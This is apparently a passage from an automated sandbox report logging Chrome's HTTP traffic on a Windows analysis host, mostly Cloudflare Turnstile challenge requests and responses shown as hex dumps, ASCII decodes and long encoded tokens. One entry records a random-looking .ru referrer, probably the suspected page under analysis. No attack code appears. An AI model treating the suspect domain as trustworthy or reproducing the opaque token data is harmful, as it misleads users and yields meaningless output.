                                                                                                            Content-Type: application/reports+json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:51 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 30 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 74 66 36 2e 6a 71 75 67 62 63 74 63 64 73 2e 72 75 2f 30 70 68 31 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 34 2e 31 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                                                                            Data Ascii: [{"age":4,"body":{"elapsed_time":701,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://tf6.jqugbctcds.ru/0ph1/","sampling_fraction":1.0,"server_ip":"104.21.24.112","status_code":404,"type":"http.error"},"type":"network-error",
                                                                                                            2024-12-21 23:46:52 UTC168INHTTP/1.1 200 OK
                                                                                                            Content-Length: 0
                                                                                                            date: Sat, 21 Dec 2024 23:46:51 GMT
                                                                                                            Via: 1.1 google
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.449775104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:51 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f5bc0d96a8b0caa/1734824809472/0068747f3768a1b24c413c2962aa9534744d0a8cc5fcb76f23f2c498ea18bb03/1-Bd7uYuoqxOXy_ HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: max-age=0
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:52 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                            Date: Sat, 21 Dec 2024 23:46:52 GMT
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Content-Length: 1
                                                                                                            Connection: close
                                                                                                            2024-12-21 23:46:52 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 41 47 68 30 66 7a 64 6f 6f 62 4a 4d 51 54 77 70 59 71 71 56 4e 48 52 4e 43 6f 7a 46 5f 4c 64 76 49 5f 4c 45 6d 4f 6f 59 75 77 4d 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gAGh0fzdoobJMQTwpYqqVNHRNCozF_LdvI_LEmOoYuwMAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                            2024-12-21 23:46:52 UTC1INData Raw: 4a
                                                                                                            Data Ascii: J


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.449779104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:53 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f5bc0d96a8b0caa/1734824809476/4QWAiHdGMOFBFnN HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: image
                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:54 UTC200INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:54 GMT
                                                                                                            Content-Type: image/png
                                                                                                            Content-Length: 61
                                                                                                            Connection: close
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc1113a063300-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 06 00 00 00 25 08 02 00 00 00 ee 96 0f 87 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                            Data Ascii: PNGIHDR%IDAT$IENDB`


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.449782104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:55 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f5bc0d96a8b0caa/1734824809476/4QWAiHdGMOFBFnN HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:56 UTC200INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:55 GMT
                                                                                                            Content-Type: image/png
                                                                                                            Content-Length: 61
                                                                                                            Connection: close
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc11bdd2b5e62-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 06 00 00 00 25 08 02 00 00 00 ee 96 0f 87 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                            Data Ascii: PNGIHDR%IDAT$IENDB`


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.449783104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:55 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            Content-Length: 31811
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            CF-Challenge: aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:55 UTC16384OUTData Raw: 76 5f 38 66 35 62 63 30 64 39 36 61 38 62 30 63 61 61 3d 36 45 2d 62 37 65 38 69 35 76 45 38 35 54 69 38 44 52 59 52 6f 54 43 38 75 36 52 50 52 2d 62 39 31 38 7a 52 4b 46 63 38 2d 38 78 52 42 62 70 31 38 65 4a 51 55 52 62 62 70 67 53 62 52 61 2d 52 69 62 65 25 32 62 52 45 62 62 4e 63 63 52 24 42 65 4c 52 6b 71 45 62 52 31 62 38 2b 52 7a 62 43 2b 52 57 62 47 6b 2b 58 4c 52 38 46 52 44 62 54 46 52 24 54 54 36 62 52 70 70 48 43 61 52 65 56 2d 38 53 57 52 2b 48 58 33 56 62 41 70 74 5a 76 5a 65 52 52 6d 54 52 52 74 4e 52 35 57 73 4a 43 52 65 45 52 54 6c 2d 52 33 73 4a 46 57 6f 62 52 30 62 33 7a 69 31 50 6a 73 6e 6e 4a 65 31 4a 71 61 34 2d 48 52 2b 5a 45 52 41 31 35 7a 47 6d 48 52 52 49 73 56 54 6a 42 32 62 38 4c 59 24 6a 4a 6a 59 67 33 64 24 57 52 4c 62 68 36
                                                                                                            Data Ascii: v_8f5bc0d96a8b0caa=6E-b7e8i5vE85Ti8DRYRoTC8u6RPR-b918zRKFc8-8xRBbp18eJQURbbpgSbRa-Ribe%2bREbbNccR$BeLRkqEbR1b8+RzbC+RWbGk+XLR8FRDbTFR$TT6bRppHCaReV-8SWR+HX3VbAptZvZeRRmTRRtNR5WsJCReERTl-R3sJFWobR0b3zi1PjsnnJe1Jqa4-HR+ZERA15zGmHRRIsVTjB2b8LY$jJjYg3d$WRLbh6
                                                                                                            2024-12-21 23:46:55 UTC15427OUTData Raw: 52 32 75 42 63 61 38 51 31 5a 31 52 2d 52 35 65 68 52 2b 42 7a 52 38 45 47 49 7a 35 56 4a 52 67 4f 73 4f 79 39 62 57 52 70 52 65 2d 52 73 52 41 45 6d 31 52 33 63 43 62 52 61 52 42 69 54 79 6d 45 52 4a 52 38 2d 38 5a 52 77 52 70 43 65 66 52 36 52 2d 57 65 69 52 4e 45 53 2d 65 4e 52 4c 52 36 2d 6d 79 63 48 62 39 35 6d 5a 52 66 62 70 42 52 76 52 6a 62 65 30 6d 58 63 72 62 52 45 6d 39 52 59 62 6a 46 6a 78 52 32 56 4c 33 65 48 42 58 69 36 42 38 2b 38 57 62 65 42 54 48 42 59 52 5a 42 47 53 38 67 52 64 42 76 58 38 47 52 4b 42 76 69 38 4f 52 32 42 43 58 38 63 62 5a 2d 43 4e 38 45 62 31 2d 43 4a 38 52 62 4b 2d 47 65 38 46 62 32 2d 43 48 38 31 62 34 2d 76 48 38 65 62 64 2d 47 7a 38 5a 62 31 35 43 73 38 4a 62 6e 35 47 73 38 73 62 4b 35 54 30 38 66 62 63 31 54 5a 38
                                                                                                            Data Ascii: R2uBca8Q1Z1R-R5ehR+BzR8EGIz5VJRgOsOy9bWRpRe-RsRAEm1R3cCbRaRBiTymERJR8-8ZRwRpCefR6R-WeiRNES-eNRLR6-mycHb95mZRfbpBRvRjbe0mXcrbREm9RYbjFjxR2VL3eHBXi6B8+8WbeBTHBYRZBGS8gRdBvX8GRKBvi8OR2BCX8cbZ-CN8Eb1-CJ8RbK-Ge8Fb2-CH81b4-vH8ebd-Gz8Zb15Cs8Jbn5Gs8sbK5T08fbc1TZ8
                                                                                                            2024-12-21 23:46:56 UTC330INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:56 GMT
                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                            Content-Length: 26300
                                                                                                            Connection: close
                                                                                                            cf-chl-gen: 6W9rgBZAqjo8NdtjQR+NAWAzA4+0yoAyLblJZT+Rtex4mGQBfcsNHR7IPAGjUxEGR5dnV1h/BsXUtyKd$EzOx9Xj/KvVKI5QV
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc11c7f4343dc-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:56 UTC1039INData Raw: 68 48 31 6f 58 45 71 49 68 57 53 45 55 6f 31 69 67 32 78 61 65 6c 71 59 57 4b 42 79 62 59 2b 6b 64 6e 4b 46 6d 58 39 32 64 59 4e 35 6e 47 78 71 6f 61 4f 48 69 71 2b 67 74 6f 69 34 65 71 79 55 64 37 69 55 76 4b 47 69 6a 72 43 68 76 4a 71 79 71 6f 50 42 79 72 69 48 6f 71 6d 4a 30 70 32 68 6c 4e 69 55 73 4b 65 71 72 64 7a 54 6e 61 76 44 31 74 69 69 35 61 2f 65 71 4b 69 37 74 4e 66 4f 72 4e 71 74 7a 4d 50 6f 71 37 47 74 7a 72 50 59 78 50 79 37 39 2f 33 36 76 66 7a 76 2b 50 6a 58 39 76 37 61 78 2f 6e 61 42 51 59 42 42 38 73 44 44 67 50 4d 43 2b 37 67 44 4f 77 64 2b 51 63 52 45 4e 73 68 38 77 33 57 37 2f 66 69 32 68 37 38 43 51 63 44 36 50 63 66 45 43 2f 75 4b 67 38 79 49 51 66 35 4f 79 55 62 47 7a 59 6f 4e 77 77 7a 4a 45 4d 35 45 79 6b 53 4e 52 77 64 42 52 35
                                                                                                            Data Ascii: hH1oXEqIhWSEUo1ig2xaelqYWKBybY+kdnKFmX92dYN5nGxqoaOHiq+gtoi4eqyUd7iUvKGijrChvJqyqoPByriHoqmJ0p2hlNiUsKeqrdzTnavD1tii5a/eqKi7tNfOrNqtzMPoq7GtzrPYxPy79/36vfzv+PjX9v7ax/naBQYBB8sDDgPMC+7gDOwd+QcRENsh8w3W7/fi2h78CQcD6PcfEC/uKg8yIQf5OyUbGzYoNwwzJEM5EykSNRwdBR5
                                                                                                            2024-12-21 23:46:56 UTC1369INData Raw: 4a 62 48 6c 77 69 6e 4e 38 57 35 6c 78 58 33 4a 6e 71 6e 6d 67 66 32 36 63 6d 62 4b 69 67 49 4f 7a 71 4a 69 54 6d 49 32 6b 72 58 61 4f 6e 35 6d 4e 66 4a 2b 79 6c 49 57 6d 6f 49 4b 39 75 70 37 4c 78 38 32 4d 70 49 7a 52 78 37 36 69 7a 5a 53 5a 71 62 6e 4c 7a 39 36 64 31 4c 2b 69 79 37 54 52 33 74 79 65 70 74 50 6a 32 72 66 66 37 74 44 6b 78 4c 33 31 36 74 2f 4a 39 64 62 6d 33 4e 4c 5a 31 2b 66 59 7a 73 48 56 78 4e 62 52 30 38 59 47 76 50 37 37 37 50 6b 42 35 73 76 75 37 65 6e 53 33 77 77 4b 38 42 6f 53 46 76 34 58 33 4f 6a 62 2f 66 50 30 37 68 6f 56 4b 43 72 68 39 53 33 71 37 52 30 46 43 69 49 6a 38 79 45 41 42 67 6b 4c 42 7a 67 73 47 7a 77 71 49 44 78 45 4e 42 63 6d 46 78 34 30 47 45 70 44 4a 51 73 76 52 43 45 69 47 30 52 4a 56 43 55 7a 4c 53 77 6c 50 43
                                                                                                            Data Ascii: JbHlwinN8W5lxX3Jnqnmgf26cmbKigIOzqJiTmI2krXaOn5mNfJ+ylIWmoIK9up7Lx82MpIzRx76izZSZqbnLz96d1L+iy7TR3tyeptPj2rff7tDkxL316t/J9dbm3NLZ1+fYzsHVxNbR08YGvP777PkB5svu7enS3wwK8BoSFv4X3Ojb/fP07hoVKCrh9S3q7R0FCiIj8yEABgkLBzgsGzwqIDxENBcmFx40GEpDJQsvRCEiG0RJVCUzLSwlPC
                                                                                                            2024-12-21 23:46:56 UTC1369INData Raw: 58 70 57 6e 69 49 4b 6f 69 49 6c 34 66 57 75 4a 62 57 69 46 67 36 2b 6c 74 71 53 42 72 5a 43 47 65 48 78 38 71 5a 75 63 73 4a 4f 68 67 37 4f 56 69 4c 32 33 70 63 57 6c 7a 4b 6d 72 79 63 65 70 7a 61 6a 4d 76 39 69 33 7a 73 61 76 79 4e 2b 59 75 4a 6d 38 30 75 53 31 31 39 7a 51 71 63 47 6c 32 4e 57 67 72 64 6e 67 33 65 6a 6a 37 36 7a 4a 74 38 4c 76 2b 39 62 61 75 4e 48 71 33 63 37 63 41 65 4d 46 38 37 72 31 31 77 54 43 79 76 34 42 41 38 50 6e 79 75 54 30 37 4f 72 6a 39 42 49 49 43 65 55 48 2b 2b 6e 33 32 42 4c 33 32 2b 50 76 38 50 4c 6c 42 50 30 6d 42 42 41 46 41 69 6b 6f 43 51 77 6a 39 79 49 6e 39 50 6f 2b 4b 79 41 4a 4c 42 4d 56 45 52 56 41 4c 77 49 61 51 42 67 6b 44 54 59 70 44 53 55 2b 54 56 4d 68 55 43 70 41 44 30 4e 4c 4a 68 6c 5a 58 79 6b 79 53 30 51
                                                                                                            Data Ascii: XpWniIKoiIl4fWuJbWiFg6+ltqSBrZCGeHx8qZucsJOhg7OViL23pcWlzKmrycepzajMv9i3zsavyN+YuJm80uS119zQqcGl2NWgrdng3ejj76zJt8Lv+9bauNHq3c7cAeMF87r11wTCyv4BA8PnyuT07Orj9BIICeUH++n32BL32+Pv8PLlBP0mBBAFAikoCQwj9yIn9Po+KyAJLBMVERVALwIaQBgkDTYpDSU+TVMhUCpAD0NLJhlZXykyS0Q
                                                                                                            2024-12-21 23:46:56 UTC1369INData Raw: 57 70 2b 67 36 75 5a 6d 6e 32 61 73 71 4a 75 71 59 2b 48 6a 61 69 36 63 32 2b 6e 6d 4b 42 34 6f 48 71 5a 74 62 4f 79 68 62 47 4a 6e 70 71 32 77 73 79 69 30 4d 65 6b 7a 64 54 52 30 37 6d 52 77 39 43 78 31 38 75 2b 72 73 6d 59 74 73 33 45 30 38 57 6b 6f 39 58 67 76 65 37 57 35 4b 6a 74 78 2b 33 31 30 64 4c 73 78 65 2f 72 39 38 72 59 36 37 7a 53 31 62 54 33 77 73 37 5a 33 41 72 44 78 63 4d 4f 2f 63 58 59 36 39 41 55 32 77 7a 6e 35 65 63 4a 38 66 44 78 47 67 59 67 45 4f 37 32 47 2f 41 51 37 68 67 48 33 76 30 56 49 43 59 76 4a 6a 41 66 4d 53 55 4c 41 75 77 4e 44 50 49 61 4c 66 59 4d 4d 43 38 31 2b 6a 67 37 45 52 51 69 4f 51 45 42 42 53 46 44 51 78 77 77 48 69 55 50 50 67 6f 70 49 31 42 57 46 6a 52 55 47 6a 52 4f 48 56 63 62 56 78 38 77 58 79 45 30 58 55 55 2f
                                                                                                            Data Ascii: Wp+g6uZmn2asqJuqY+Hjai6c2+nmKB4oHqZtbOyhbGJnpq2wsyi0MekzdTR07mRw9Cx18u+rsmYts3E08Wko9Xgve7W5Kjtx+310dLsxe/r98rY67zS1bT3ws7Z3ArDxcMO/cXY69AU2wzn5ecJ8fDxGgYgEO72G/AQ7hgH3v0VICYvJjAfMSULAuwNDPIaLfYMMC81+jg7ERQiOQEBBSFDQxwwHiUPPgopI1BWFjRUGjROHVcbVx8wXyE0XUU/
                                                                                                            2024-12-21 23:46:56 UTC1369INData Raw: 53 69 69 36 57 56 71 6f 31 77 69 4a 4f 37 6d 37 52 38 6b 4b 42 2b 72 72 4b 69 66 63 54 41 6e 6e 2f 47 6e 71 4b 4b 7a 63 69 39 6e 64 44 47 6b 4d 33 54 31 39 54 56 78 70 4b 74 75 70 54 64 71 39 66 62 71 37 37 43 75 65 4b 38 33 74 4b 39 78 73 47 75 34 75 62 5a 32 72 4c 70 78 75 65 78 38 37 61 73 72 64 54 7a 31 72 66 32 41 75 33 79 75 74 49 47 38 4d 44 67 35 76 73 4f 39 77 4c 66 34 4e 72 38 42 2f 55 56 39 4d 2f 68 42 77 66 56 45 50 54 36 37 76 30 41 41 52 6e 78 39 67 58 32 46 41 55 59 43 52 7a 70 43 2b 63 77 42 51 37 72 41 76 51 67 42 76 51 6f 47 78 67 30 4e 42 6b 4d 4f 42 6f 6a 49 53 4c 33 4a 41 41 71 43 54 59 2b 53 45 30 38 4c 68 34 37 50 44 45 32 44 7a 38 50 46 54 45 37 4b 56 42 59 52 31 4d 64 46 45 45 65 4a 56 46 43 49 57 67 70 53 53 4e 6f 57 6c 6b 6e 61
                                                                                                            Data Ascii: Sii6WVqo1wiJO7m7R8kKB+rrKifcTAnn/GnqKKzci9ndDGkM3T19TVxpKtupTdq9fbq77CueK83tK9xsGu4ubZ2rLpxuex87asrdTz1rf2Au3yutIG8MDg5vsO9wLf4Nr8B/UV9M/hBwfVEPT67v0AARnx9gX2FAUYCRzpC+cwBQ7rAvQgBvQoGxg0NBkMOBojISL3JAAqCTY+SE08Lh47PDE2Dz8PFTE7KVBYR1MdFEEeJVFCIWgpSSNoWlkna
                                                                                                            2024-12-21 23:46:56 UTC1369INData Raw: 59 62 35 43 53 65 33 65 51 64 6f 6d 4c 6b 59 2b 67 64 35 6a 47 78 35 47 67 70 73 4b 61 6f 36 65 35 30 70 75 2f 6b 73 36 54 72 71 53 52 6d 70 48 4a 31 70 7a 4c 31 5a 6d 67 35 4d 50 6a 74 2b 58 44 36 62 57 31 33 75 62 48 34 4b 2b 73 71 50 54 65 37 73 37 44 79 4f 50 54 31 72 66 32 7a 63 76 49 76 64 6a 78 34 4c 33 45 75 62 37 2b 33 76 66 4b 78 73 73 4f 2b 52 50 62 37 66 37 68 31 51 59 58 45 65 7a 53 2f 4e 50 30 39 74 2f 62 39 4e 72 74 37 2f 58 7a 42 64 76 38 4b 79 7a 31 42 51 73 6e 2f 75 2f 6c 4d 69 30 4c 45 78 67 33 2b 4f 33 36 4e 2f 54 31 4b 6a 77 4d 4d 68 45 37 45 42 38 5a 48 68 30 6d 53 42 77 6d 55 55 49 49 4b 46 52 51 48 69 39 48 57 43 63 79 54 46 64 49 4e 79 74 54 48 79 78 51 55 6d 41 64 47 69 64 67 4b 32 31 4d 61 79 30 69 57 33 45 78 63 48 49 75 4c 53
                                                                                                            Data Ascii: Yb5CSe3eQdomLkY+gd5jGx5GgpsKao6e50pu/ks6TrqSRmpHJ1pzL1Zmg5MPjt+XD6bW13ubH4K+sqPTe7s7DyOPT1rf2zcvIvdjx4L3Eub7+3vfKxssO+RPb7f7h1QYXEezS/NP09t/b9Nrt7/XzBdv8Kyz1BQsn/u/lMi0LExg3+O36N/T1KjwMMhE7EB8ZHh0mSBwmUUIIKFRQHi9HWCcyTFdINytTHyxQUmAdGidgK21May0iW3ExcHIuLS
                                                                                                            2024-12-21 23:46:56 UTC1369INData Raw: 75 37 6d 39 67 71 2f 46 75 34 53 7a 66 35 4b 49 79 4c 57 46 69 6f 47 39 78 70 44 50 6a 73 32 55 78 61 66 53 6d 4e 66 4e 30 35 7a 4c 33 64 61 67 75 64 33 67 72 74 50 6c 34 4b 66 6e 32 61 61 72 36 39 33 73 73 4d 6e 69 76 72 4f 70 36 66 4f 34 35 2f 47 31 75 2f 7a 70 2b 73 44 78 30 2f 37 47 38 77 59 46 79 4f 48 47 42 38 76 37 7a 67 37 61 41 42 59 50 30 78 55 43 45 4e 6a 78 31 74 58 63 44 4e 66 71 34 50 6b 6d 48 65 4d 6b 47 68 2f 6e 47 42 34 6b 37 42 34 41 4c 4f 38 77 38 69 76 30 4a 43 59 79 2b 69 6a 36 4e 41 63 73 51 6a 63 42 4d 50 35 41 42 45 52 47 41 67 6b 34 50 78 63 4d 50 41 73 4c 45 45 42 4f 54 42 56 56 51 6c 55 62 53 69 78 58 48 44 5a 61 57 53 41 57 5a 6d 41 6b 56 46 73 7a 4b 46 68 75 61 53 77 69 62 6d 67 77 53 6e 5a 74 50 32 52 79 64 54 63 79 5a 6e 55
                                                                                                            Data Ascii: u7m9gq/Fu4Szf5KIyLWFioG9xpDPjs2UxafSmNfN05zL3dagud3grtPl4Kfn2aar693ssMnivrOp6fO45/G1u/zp+sDx0/7G8wYFyOHGB8v7zg7aABYP0xUCENjx1tXcDNfq4PkmHeMkGh/nGB4k7B4ALO8w8iv0JCYy+ij6NAcsQjcBMP5ABERGAgk4PxcMPAsLEEBOTBVVQlUbSixXHDZaWSAWZmAkVFszKFhuaSwibmgwSnZtP2RydTcyZnU
                                                                                                            2024-12-21 23:46:56 UTC1369INData Raw: 34 36 67 77 71 57 58 79 70 79 62 6c 71 6a 43 72 5a 2f 53 70 4b 4f 65 73 49 37 5a 71 4b 4f 6f 79 70 33 50 33 71 36 78 34 62 50 65 72 39 57 6e 34 37 50 45 71 37 61 73 36 2b 36 2f 76 66 50 79 77 73 58 31 78 2f 4b 33 2b 64 7a 47 79 65 7a 51 2b 73 76 63 77 38 37 55 33 76 4c 39 31 51 76 39 78 39 2f 6e 7a 77 62 53 46 50 44 6a 33 76 44 4f 47 75 6f 4b 36 41 37 64 45 4f 7a 71 38 68 48 30 47 4f 34 43 42 43 72 38 4b 67 6b 66 39 67 72 34 41 50 6f 4f 44 44 59 49 4a 67 55 75 2b 53 77 5a 42 78 41 74 45 53 49 4c 48 54 5a 47 47 55 59 6c 4f 42 4d 6b 42 42 77 6a 50 30 38 75 45 53 30 6f 56 69 6c 57 4e 54 6f 6a 4e 56 73 36 48 54 6b 78 4d 43 73 39 59 30 49 6c 56 7a 78 71 50 57 70 4a 59 54 64 4a 62 30 34 78 59 30 56 45 50 31 46 33 56 6a 68 37 55 48 35 52 66 6c 31 32 53 31 32 44
                                                                                                            Data Ascii: 46gwqWXypyblqjCrZ/SpKOesI7ZqKOoyp3P3q6x4bPer9Wn47PEq7as6+6/vfPywsX1x/K3+dzGyezQ+svcw87U3vL91Qv9x9/nzwbSFPDj3vDOGuoK6A7dEOzq8hH0GO4CBCr8Kgkf9gr4APoODDYIJgUu+SwZBxAtESILHTZGGUYlOBMkBBwjP08uES0oVilWNTojNVs6HTkxMCs9Y0IlVzxqPWpJYTdJb04xY0VEP1F3Vjh7UH5Rfl12S12D


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.449784104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
